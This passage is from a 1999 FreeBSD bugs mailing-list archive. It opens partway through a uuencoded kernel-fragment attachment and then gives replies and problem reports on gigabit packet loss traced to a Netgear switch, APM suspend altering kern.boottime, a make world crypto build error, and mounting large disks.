MX%#H_9$0`(M5",=",`$```"#Q`3IQ0$``(UV`(MU"(M.-(M9#(7;=0_'1C`( M````Z:D!``"-=@#H!Y(0`(G']D9@`70^]H.+`````G0U@WYD`'0O_W9D_W8T MZ/$6``"#Q`B#/60)*<``=!C_=C3HC0D``/]V9&B)&R/`Z"2L`P"#Q`SV1F`" M=&3V@[@````"=!Z+10B`8$7W_[/$````4VA\VQ'`Z"92`P"#Q`SK")"+50B` M2D4(BTYH#Z\-H%4IP+C336(0]^'!Z@924VA\VQ'`Z*U1`P")A7C___^)@\0` M``"`B[@````"@\0,]D9@!'0C]H.X````!'0,BTT(@&%%]^L1C78`@(NX```` M!(M%"(!(10CV1F`(=";V@[@````(=0:#>V``=0F+50B`8D7WZPZ`B[@````( MBTT(@$E%"%?HO)`0`(/$!(M%"/9`10AU#VH!:@'_=C3HH`\``(/$#(N;M``` M`(M5"(E:;,=",`$```#K9HM-"%&+033_,.B:%@``@\0(ZU.0BU4(4O]R8(M* M-%'_,>@B&0``@\00ZSN0BT4(QT`P.@```.LNBU4(]D)%"'0-:@'_ M7\G#B?95B>6#[`A75E.+30B+<5B+432+0@2+>!2+3RR)3?B+6@SH*I`0`(E% M_/]+6/]+7.LCC78`3G0L:.@#``#H`UH0`%>+1P3_T.AT*@``Z'\J``"#Q`B+ M3?B#>30`?M>#>UP`?-'_0UC_0UR%]G1+BTT(4>A*]?__@\0$3G0P5XM'!/_0 MZ#DJ``#H1"H``(/$!(M-"/9!,#]U$&CH`P``Z*)9$`"#Q`1.==2%]G46BTT( MQT$P"P```.L*BTT(QT$P-````(M-_%'H18\0`(UE[%M>7\G#D%6)Y8/L!%=6 M4XM]"(MU#(M''(M8#.BZCQ``B47\@W\(_W09.S=S$%;_=PB-0S!0Z.@N``"# MQ`PQV^MID(DW_T,\BT,\B4<$5XU#,%#H1RX``(M''(MP!(/$"(-[6`!^0/:# MN````!!T&HM#8`-#7%"-0T10Z%\P``"`H[@```#O@\0(BT,PBT`$_S"-0PA0 MBT84_W`LZ"X```"#Q`SK`Y`QP(G#BU7\4NB/CA``@\0$A=MT"XM''/]P!.A1 M````C67P6UY?R<.058GE4XM="(M-#(M5$(L!@WD(_W03.<)S"E+_<0A3Z#$N M```QP.LRT``(MP#(U6,(E5]%;H&`\``(G'@\0,A?\/A)X```"+5?S_2BS_ M0C!J`8M5]%+H2RT``(G#BU7X4NBTC1``_S/_@@`?D:#?E@`?D#VAK@````0=!J+1F`#1EQ0C49$4.@+ M+P``@*:X````[X/$"(M&,(M`!/\PC48(4(M5"(M"%/]P+.C7_O__@\0,BU7\ M@WH(`'X*@WHL``^/,?___XM5_/]*$(M5^%+H)HT0`(UEZ%M>7\G#B?95B>6# M[`Q75E.+50B+0A2+0"R)1?SH0HT0`(E%^(M5_/]")(G"4NCQC!``Z(2-$`") M1?B#Q`3IK0$``)"+5?R#>C0`#XZL`0``Z`Z-$`")1?2+5?R#>B0!=@Y0Z+R, M$`"#Q`3IC0$``&H!BT7\@\`44.@R+```BW@,@\0(@[^T`````'53BT=$BW`$ MA?9U'6C`&R/`Z".G`P"+5?12Z'J,$`"#Q`CI/@$``(GV]D9%$'1`@ST@A27` M`'\Q_X>T````QT8,`````*&H8RG`B3"#Q@R)-:AC*<"+5?12Z#N,$`"#Q`3I M_P```(UV`/\-((4EP(M5_(EZ*(U?1/]V"%/HI"L``(/$",=&#`````"+0RB) M1A"+0RB),(U6#(E3*,=&"/[_____0QS_2QB+5?12Z.>+$`"+5?S_2C3_0CB# MQ`2#?TP`?BF#?UP`?B.+1T2+0`3_,(U'&%"+50B+0A2+0"R#P!10Z#W]__^# MQ`R)]H7V=!_V1D4(=!GHW8L0`(E%]/^'M````(G"4NB,BQ``@\0$BU7X4NB` MBQ``@\0$]H>H`````G0(@$Y%@.L&B?:`9D5_BT8TBT`$BT`45E"+`/_0Z)2+ M$`")1?2+5?S'0B@`````B<)2Z#^+$`#HTHL0`(E%^(/$#(M5_(-Z'``/CT?^ M__^+5?A2Z!Z+$`#H68L0`(E%^(M5_/]*)(G"4N@(BQ``C67H6UY?R<-5B>6+ M10B+30R+422)4"2+42R)4"R+45B)4%B+442)4$1H0`$``(/`8%"#P6!1Z+GW M#P#)PXUV`%6)Y8M-"(M5#(M%$(D!B5$TBT($BT`0B4$X@WH(`'0,BT((BT`4 MB4$\ZPB0QT$\_____X-Z#`!T%XM"#(M`+(E!0(M"#/]`4(M`4(E!!.L'QT%` M_____\=!"/_____'040`````R<.058GE5E-J`6A@VB7`:A#H*<<"`(G#@\0, MA=MU"+@T````ZS&0_W48_W44_W40_W4,4^@F````B<:#Q!2#_@%T#6A@VB7` M4^@5R@(`,=N+10B)&(GPC67X6U[)PY!5B>6#[`A75E.+71#'1?P!````,?8Q M_^@HBA``B47X4^B'#P``B<.#Q`2%VW4*QT7\!P```.MGD(M5%%)3Z)(/``") MQH/$"(7V=2.+51124^C3"P``@\0(APP`=!C_P@`=!7_ MP0`=`__A3_=0R%P'46N`$```#K#Y"+00B#>!3_=2BX`@```(M3##M1#'0G@WHL_W4, MAP@`=!6+0PC_6+10B#>`@` M=0BX_____^L'D(M`"(M`%,G#58GEBT4(@W@,`'4(N/_____K!Y"+0`R+0"S) MPU6)Y8M%"(M`!(M`%,G#B?95B>6+10B+`,G#B?95B>6#[`175E.+=0B+1C2+ M6`R+>`3H4H<0`(E%_(U#1/]((/]`%*',8RG`.P7(8RG`=A%6Z+\'``#_# Subject: Re: kern/14623: packet loss on gigabit network In-Reply-To: <19991031233822.A12282@prism.flugsvamp.com> from Jonathan Lemon at "Oct 31, 1999 11:38:22 pm" To: jlemon@flugsvamp.com (Jonathan Lemon) Date: Mon, 1 Nov 1999 00:44:04 -0700 (MST) Cc: bugs@FreeBSD.ORG, FreeBSD-gnats-submit@FreeBSD.ORG From: "Kenneth D. Merry" X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jonathan Lemon wrote... > Upon further investigation, this appears to be a bit-pattern problem. > Attached is a file which refuses to transfer via a "ftp get". (The > smallest part of a /kernel file that I can figure out which will > reproduce the problem). > > Are there any known issues with either the Netgear switch or Alteon card? I haven't had any problems with the Alteon boards. I would suspect the switch. If you want to be sure that the card isn't at fault, get two, put them back to back, and ftp the file from one machine to another. I tried ftping your 'badfile' between two machines with 512K ACEnic boards (connected by fiber, no switch in between) and had no trouble: ftp> bin 200 Type set to I. ftp> get badfile local: badfile remote: badfile 200 PORT command successful. 150 Opening BINARY mode data connection for 'badfile' (12288 bytes). 100% |**************************************************| 12288 00:00 ETA 226 Transfer complete. 12288 bytes received in 0.00 seconds (12.07 MB/s) ftp> I also haven't had any trouble with these boards and an Alteon ACEswitch 180. So I would suspect the switch. Taking it out of the loop, if possible, might confirm whether or not it is the problem. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 31 23:50: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A421D14E20 for ; Sun, 31 Oct 1999 23:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA38394; Sun, 31 Oct 1999 23:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 31 Oct 1999 23:50:01 -0800 (PST) Message-Id: <199911010750.XAA38394@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/14623: packet loss on gigabit network Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/14623; it has been noted by GNATS. From: "Kenneth D. Merry" To: jlemon@flugsvamp.com (Jonathan Lemon) Cc: bugs@FreeBSD.ORG, FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/14623: packet loss on gigabit network Date: Mon, 1 Nov 1999 00:44:04 -0700 (MST) Jonathan Lemon wrote... > Upon further investigation, this appears to be a bit-pattern problem. > Attached is a file which refuses to transfer via a "ftp get". (The > smallest part of a /kernel file that I can figure out which will > reproduce the problem). > > Are there any known issues with either the Netgear switch or Alteon card? I haven't had any problems with the Alteon boards. I would suspect the switch. If you want to be sure that the card isn't at fault, get two, put them back to back, and ftp the file from one machine to another. I tried ftping your 'badfile' between two machines with 512K ACEnic boards (connected by fiber, no switch in between) and had no trouble: ftp> bin 200 Type set to I. ftp> get badfile local: badfile remote: badfile 200 PORT command successful. 150 Opening BINARY mode data connection for 'badfile' (12288 bytes). 100% |**************************************************| 12288 00:00 ETA 226 Transfer complete. 12288 bytes received in 0.00 seconds (12.07 MB/s) ftp> I also haven't had any trouble with these boards and an Alteon ACEswitch 180. So I would suspect the switch. Taking it out of the loop, if possible, might confirm whether or not it is the problem. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 3:11:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A5E6514A18; Mon, 1 Nov 1999 03:11:30 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA54073; Mon, 1 Nov 1999 03:11:29 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 1 Nov 1999 03:11:29 -0800 (PST) From: Message-Id: <199911011111.DAA54073@freefall.freebsd.org> To: zh_xf@yahoo.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/14551: strsep() Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: strsep() State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Mon Nov 1 03:10:49 PST 1999 State-Changed-Why: OOps. I replied to this one privately and forgot to close the PR when the originator mailed me confirmation. Pilot error. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 7:10: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 55FCE14E5C for ; Mon, 1 Nov 1999 07:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA26583; Mon, 1 Nov 1999 07:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A7BE314BC2; Mon, 1 Nov 1999 07:08:29 -0800 (PST) Message-Id: <19991101150829.A7BE314BC2@hub.freebsd.org> Date: Mon, 1 Nov 1999 07:08:29 -0800 (PST) From: gerst4@pitt.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14646: kern.boottime affected by APM suspend/resume Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14646 >Category: kern >Synopsis: kern.boottime affected by APM suspend/resume >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Nov 1 07:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Gary Rafe >Release: 3.3 >Organization: University of Pittsburgh >Environment: FreeBSD toshnik 3.3-RELEASE FreeBSD 3.3-RELEASE #2: Sun Oct 31 13:59:26 EST 1999 root@toshnik:/usr/src/sys/compile/TOSHNIK_PAO i386 >Description: Following an APM suspend/resume cycle, "sysctl kern.boottime" reports the incorrect boottime. Also, "uptime" reports running system time, not calendar time since the system was started. This is observed on Toshibas 220CDS, 330CDS, & 4030CDT running 3.2-RELEASE, and 3.3-RELEASE, with and without the respective PAO3 patches. >How-To-Repeat: With the appropriate kernel configuration, suspend with "apm -z", then resume normally. Verify with "sysctl kern.boottime" and "uptime" commands. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 8:55:15 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from www.RCousins.com (solomon.rcousins.com [205.179.174.194]) by hub.freebsd.org (Postfix) with ESMTP id EE3AB1528F for ; Mon, 1 Nov 1999 08:55:10 -0800 (PST) (envelope-from rec@RCousins.com) Received: from RCousins.com (gw2k.rcousins.com [205.179.174.206]) by www.RCousins.com (8.9.0/8.9.0) with ESMTP id IAA11191 for ; Mon, 1 Nov 1999 08:55:09 -0800 (PST) Message-ID: <381DC5E7.8B8E73B@RCousins.com> Date: Mon, 01 Nov 1999 08:55:03 -0800 From: Robert Cousins Organization: Cousins Consulting X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: follow up to previous vinum message Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------msF666BD3C90B9BA96374FCC08" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a cryptographically signed message in MIME format. --------------msF666BD3C90B9BA96374FCC08 Content-Type: multipart/mixed; boundary="------------0D627181C723D292687775F3" This is a multi-part message in MIME format. --------------0D627181C723D292687775F3 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hello: I've tried to build a filesystem on the 37.5 gb disks mentioned in my previous message. The Newfs works, but it can't be mounted. I now suspect the hardware. DOes anyone have experience with these large disks under FreeBSD? Thanx --------------0D627181C723D292687775F3 Content-Type: text/x-vcard; charset=us-ascii; name="rec.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Robert Cousins Content-Disposition: attachment; filename="rec.vcf" begin:vcard n:Cousins;Robert tel;fax:(408) 867-6956 tel;home:(408) 867-4237 tel;work:(408) 867-4237 x-mozilla-html:FALSE url:http://www.rcousins.com/rec org:Cousins Consulting adr:;;14330 Cordwood Court;Saratoga;California;95070;USA version:2.1 email;internet:rec@RCousins.com title:Principal x-mozilla-cpt:;20048 fn:Robert Cousins end:vcard --------------0D627181C723D292687775F3-- --------------msF666BD3C90B9BA96374FCC08 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIJ7AYJKoZIhvcNAQcCoIIJ3TCCCdkCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC B+4wggS4MIIEIaADAgECAhAz36ad4dszDO5FXZmtFHrQMA0GCSqGSIb3DQEBBAUAMIHMMRcw FQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29y azFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5 IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRp dmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkMB4XDTk5MDIxNzAwMDAw MFoXDTAwMDIxNzIzNTk1OVowggEUMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UE CxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9y ZXBvc2l0b3J5L1JQQSBJbmNvcnAuIGJ5IFJlZi4sTElBQi5MVEQoYyk5ODEeMBwGA1UECxMV UGVyc29uYSBOb3QgVmFsaWRhdGVkMTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBO ZXRzY2FwZSBGdWxsIFNlcnZpY2UxGjAYBgNVBAMUEVJvYmVydCBFLiBDb3VzaW5zMR8wHQYJ KoZIhvcNAQkBFhByZWNAcmNvdXNpbnMuY29tMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANpj 71VzaVM1lTYLHlapmSWkzw+If7rncnv9+gZ+tGMEzO5eBD5PhW6/jOXNBsA5DDAVZhisura7 SoshB2IH9iUCAwEAAaOCAZIwggGOMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAGC2CGSAGG +EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlzaWduLmNvbS9DUFMwYgYI KwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjADAgEBGj1WZXJpU2lnbidzIENQUyBpbmNv cnAuIGJ5IHJlZmVyZW5jZSBsaWFiLiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCG SAGG+EIBAQQEAwIHgDCBhgYKYIZIAYb4RQEGAwR4FnZkNDY1MmJkNjNmMjA0NzAyOTI5ODc2 M2M5ZDJmMjc1MDY5YzczNTliZWQxYjA1OWRhNzViYzRiYzk3MDE3NDdkYTVkM2YyMTQxYmVh ZGIyYmQyZTg5MjFmYTg2YmY2ZDcxMTQ5OWFhM2JlNDRmY2YzZWE0NTBjMDMGA1UdHwQsMCow KKAmoCSGImh0dHA6Ly9jcmwudmVyaXNpZ24uY29tL2NsYXNzMS5jcmwwDQYJKoZIhvcNAQEE BQADgYEAswimlbKQ4BbURbh6VjfSubIlDwGsOrDCfkO7+FaX1QFieLWJuvjI+b3TFkv0lxWb MndRV0rGUOqlkbp/ndNZ2LW7zYaCeia++qh1JRLUdR2aT1F/0+9PaFNN1w8IRXixb4iIcGrJ bU2Q3w0t2nc6I/Q0zRzWMDItnXMOcNkb13swggMuMIICl6ADAgECAhEA0nYujRQMPX2yqCVd r+4NdTANBgkqhkiG9w0BAQIFADBfMQswCQYDVQQGEwJVUzEXMBUGA1UEChMOVmVyaVNpZ24s IEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGljIFByaW1hcnkgQ2VydGlmaWNhdGlvbiBB dXRob3JpdHkwHhcNOTgwNTEyMDAwMDAwWhcNMDgwNTEyMjM1OTU5WjCBzDEXMBUGA1UEChMO VmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNV BAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5jb3JwLiBCeSBSZWYuLExJ QUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0EgSW5kaXZpZHVhbCBT dWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw gYkCgYEAu1pEigQWu1X9A3qKLZRPFXg2uA1Ksm+cVL+86HcqnbnwaLuV2TFBcHqBS7lIE1Yt xwjhhEKrwKKSq0RcqkLwgg4C6S/7wju7vsknCl22sDZCM7VuVIhPh0q/Gdr5FegPh7Yc48zG mo5/aiSS4/zgZbqnsX7vyds3ashKyAkG5JkCAwEAAaN8MHowEQYJYIZIAYb4QgEBBAQDAgEG MEcGA1UdIARAMD4wPAYLYIZIAYb4RQEHAQEwLTArBggrBgEFBQcCARYfd3d3LnZlcmlzaWdu LmNvbS9yZXBvc2l0b3J5L1JQQTAPBgNVHRMECDAGAQH/AgEAMAsGA1UdDwQEAwIBBjANBgkq hkiG9w0BAQIFAAOBgQCIuDc73dqUNwCtqp/hgQFxHpJqbS/28Z3TymQ43BuYDAeGW4UVag+5 SYWklfEXfWe0fy0s3ZpCnsM+tI6q5QsG3vJWKvozx74Z11NMw73I4xe1pElCY+zCphcPXVga STyQXFWjZSAA/Rgg5V+CprGoksVYasGNAzzrw80FopCubjGCAcYwggHCAgEBMIHhMIHMMRcw FQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29y azFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5 IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRp dmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkAhAz36ad4dszDO5FXZmt FHrQMAkGBSsOAwIaBQCgfTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJ BTEPFw05OTExMDExNjU1MDRaMB4GCSqGSIb3DQEJDzERMA8wDQYIKoZIhvcNAwICASgwIwYJ KoZIhvcNAQkEMRYEFLkU6/4eDDPpCvZFPG3Rp6FuuwbLMA0GCSqGSIb3DQEBAQUABEB3IUA7 X4+3uGaDVHleP3djqt+O/QiWSY3p/1S3xErXHoGqhi9svVDgrTjDZ5c/xiHh+/64OKpGp4HY HqEm1Hai --------------msF666BD3C90B9BA96374FCC08-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 9:12: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from www.matti.ee (solaris.matti.ee [194.126.98.135]) by hub.freebsd.org (Postfix) with ESMTP id 7367E14BCD for ; Mon, 1 Nov 1999 09:11:49 -0800 (PST) (envelope-from vallo@matti.ee) Received: from myhakas.matti.ee (myhakas.matti.ee [194.126.114.87]) by www.matti.ee (8.9.3/8.9.3) with ESMTP id TAA26296; Mon, 1 Nov 1999 19:11:36 +0200 (EET) Received: by myhakas.matti.ee (Postfix, from userid 1000) id 10619102; Mon, 1 Nov 1999 19:11:47 +0200 (EET) Date: Mon, 1 Nov 1999 19:11:46 +0200 From: Vallo Kallaste To: Robert Cousins Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: follow up to previous vinum message Message-ID: <19991101191146.A1273@myhakas.matti.ee> Reply-To: vallo@matti.ee References: <381DC5E7.8B8E73B@RCousins.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <381DC5E7.8B8E73B@RCousins.com>; from Robert Cousins on Mon, Nov 01, 1999 at 08:55:03AM -0800 Organization: =?iso-8859-1?Q?AS_Matti_B=FCrootehnika?= Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Nov 01, 1999 at 08:55:03AM -0800, Robert Cousins wrote: > Hello: > I've tried to build a filesystem on the 37.5 gb disks mentioned > in my previous message. The Newfs works, but it can't be mounted. > I now suspect the hardware. > DOes anyone have experience with these large disks under > FreeBSD? Yes. I have one in our mp3 machine. PIIX3 controller on the quite old Intel PPro motherboard, newest BIOS and no marginal problems so far. New ata drivers claim sometimes lost disk contact but I haven't seen anything else caused by this. -- Vallo Kallaste vallo@matti.ee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 10:30: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E2716152AD for ; Mon, 1 Nov 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA15030; Mon, 1 Nov 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id F344B15035; Mon, 1 Nov 1999 10:26:17 -0800 (PST) Message-Id: <19991101182617.F344B15035@hub.freebsd.org> Date: Mon, 1 Nov 1999 10:26:17 -0800 (PST) From: obrien@freebsd.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/14648: `make world' now requires -DNOCRYPT in my environment, where -DNOSECURE was suffient 2 months ago (and still in -STABLE). Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14648 >Category: bin >Synopsis: `make world' now requires -DNOCRYPT in my environment, where -DNOSECURE was suffient 2 months ago (and still in -STABLE). >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Nov 1 10:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: David O'Brien >Release: 4.0-CURRENT >Organization: The FreeBSD Project >Environment: >Description: If one CVSup's "src-all", `make world' now requires -DNOCRYPT in my environment, where -DNOSECURE was suffient (and probably not needed) 2 months ago (and still in -STABLE). W/o -DNOCRYPT, `make world' errors out with: cd /usr/src/secure/lib/libdes; /usr/obj/usr/src/tmp/usr/bin/make beforeinstall install -C -o root -g wheel -m 444 /usr/src/secure/lib/libdes/../../../crypto/li bdes/des.h /usr/obj/usr/src/tmp/usr/include install: /usr/src/secure/lib/libdes/../../../crypto/libdes/des.h: No such file o r directory *** Error code 71 Stop in /usr/src/secure/lib/libdes. *** Error code 1 >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 10:34: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A091F14BEB; Mon, 1 Nov 1999 10:34:01 -0800 (PST) (envelope-from jlemon@FreeBSD.org) Received: (from jlemon@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA15494; Mon, 1 Nov 1999 10:34:01 -0800 (PST) (envelope-from jlemon@FreeBSD.org) Date: Mon, 1 Nov 1999 10:34:01 -0800 (PST) From: Message-Id: <199911011834.KAA15494@freefall.freebsd.org> To: jlemon@flugsvamp.com, jlemon@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14623: Some Netgear FS509s have problems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Old Synopsis: packet loss on gigabit network New Synopsis: Some Netgear FS509s have problems State-Changed-From-To: open->closed State-Changed-By: jlemon State-Changed-When: Mon Nov 1 10:26:59 PST 1999 State-Changed-Why: Netgear tech support confirmed that some FS509 units have knwon problems; one thing mentioned was a batch of faulty SGRAM. The unit in question is being RMA'd to Netgear, I'll reopen this PR if the new unit still has problems. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 10:38:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C29DE14C81; Mon, 1 Nov 1999 10:38:24 -0800 (PST) (envelope-from obrien@FreeBSD.org) Received: (from obrien@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA15943; Mon, 1 Nov 1999 10:38:24 -0800 (PST) (envelope-from obrien@FreeBSD.org) Date: Mon, 1 Nov 1999 10:38:24 -0800 (PST) From: Message-Id: <199911011838.KAA15943@freefall.freebsd.org> To: obrien@FreeBSD.org, freebsd-bugs@FreeBSD.org, markm@FreeBSD.org Subject: Re: bin/14648: `make world' now requires -DNOCRYPT in my environment, where -DNOSECURE was suffient 2 months ago (and still in -STABLE). Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: `make world' now requires -DNOCRYPT in my environment, where -DNOSECURE was suffient 2 months ago (and still in -STABLE). Responsible-Changed-From-To: freebsd-bugs->markm Responsible-Changed-By: obrien Responsible-Changed-When: Mon Nov 1 10:38:02 PST 1999 Responsible-Changed-Why: Mark's the crypto guy. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 10:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DCB7E14BDC for ; Mon, 1 Nov 1999 10:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA16248; Mon, 1 Nov 1999 10:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 304BA14D5B; Mon, 1 Nov 1999 10:31:39 -0800 (PST) Message-Id: <19991101183139.304BA14D5B@hub.freebsd.org> Date: Mon, 1 Nov 1999 10:31:39 -0800 (PST) From: andyf@speednet.com.au To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: gnu/14649: Perl "tutorials" missing from documentation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14649 >Category: gnu >Synopsis: Perl "tutorials" missing from documentation >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: 